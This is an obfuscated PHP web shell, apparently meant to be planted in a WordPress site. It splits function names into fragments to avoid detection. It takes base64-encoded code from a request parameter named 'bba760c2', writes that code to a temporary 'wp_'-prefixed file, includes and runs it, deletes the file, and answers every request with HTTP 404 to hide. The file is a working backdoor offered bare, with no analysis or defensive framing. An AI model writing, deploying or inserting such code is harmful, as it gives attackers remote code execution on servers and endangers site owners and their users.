<?php
try{
$qf1f94=array('file_'.'put_contents','sys_get_temp_'.'dir','tem'.'pnam','unli'.'nk','base64_de'.'code','array_key'.'_exists');
$jad36d='bba7'.'60c2';
if($qf1f94[5]($jad36d,$_POST)){
$za12cc=$qf1f94[4]($_POST[$jad36d]);
}elseif($qf1f94[5]($jad36d,$_GET)){
$za12cc=$qf1f94[4]($_GET[$jad36d]);
}else{$za12cc=null;}
if($za12cc){
$f677ea=$qf1f94[2]($qf1f94[1](),'w'.'p_');
if($f677ea){
$qf1f94[0]($f677ea,'<'.'?ph'.'p '.$za12cc);
http_response_code(404);
@include_once($f677ea);
@$qf1f94[3]($f677ea);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
